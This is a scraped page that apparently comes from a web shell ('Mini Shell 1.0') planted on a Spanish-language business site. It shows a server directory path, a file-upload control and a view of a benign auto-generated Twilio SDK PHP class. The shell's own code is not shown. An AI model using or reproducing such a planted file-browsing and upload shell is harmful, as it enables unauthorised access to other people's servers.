HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

¡Página no encontrada!

La página que busca no se encuentra en nuestro servidor.

Volver al inicio
DIR: /var/www/devs.lapieza.net/vendor/twilio/sdk/src/Twilio/Rest/FlexApi/V1/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/twilio/sdk/src/Twilio/Rest/FlexApi/V1/InsightsSegmentsContext.php
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\FlexApi\V1;

use Twilio\Exceptions\TwilioException;
use Twilio\InstanceContext;
use Twilio\Options;
use Twilio\Values;
use Twilio\Version;

/**
 * PLEASE NOTE that this class contains preview products that are subject to change. Use them with caution. If you currently do not have developer preview access, please contact help@twilio.com.
 */
class InsightsSegmentsContext extends InstanceContext {
    /**
     * Initialize the InsightsSegmentsContext
     *
     * @param Version $version Version that contains the resource
     * @param string $segmentId Unique segment Id
     */
    public function __construct(Version $version, $segmentId) {
        parent::__construct($version);

        // Path Solution
        $this->solution = ['segmentId' => $segmentId, ];

        $this->uri = '/Insights/Segments/' . \rawurlencode($segmentId) . '';
    }

    /**
     * Fetch the InsightsSegmentsInstance
     *
     * @param array|Options $options Optional Arguments
     * @return InsightsSegmentsInstance Fetched InsightsSegmentsInstance
     * @throws TwilioException When an HTTP error occurs.
     */
    public function fetch(array $options = []): InsightsSegmentsInstance {
        $options = new Values($options);

        $headers = Values::of(['Token' => $options['token'], ]);

        $payload = $this->version->fetch('GET', $this->uri, [], [], $headers);

        return new InsightsSegmentsInstance($this->version, $payload, $this->solution['segmentId']);
    }

    /**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    public function __toString(): string {
        $context = [];
        foreach ($this->solution as $key => $value) {
            $context[] = "$key=$value";
        }
        return '[Twilio.FlexApi.V1.InsightsSegmentsContext ' . \implode(' ', $context) . ']';
    }
}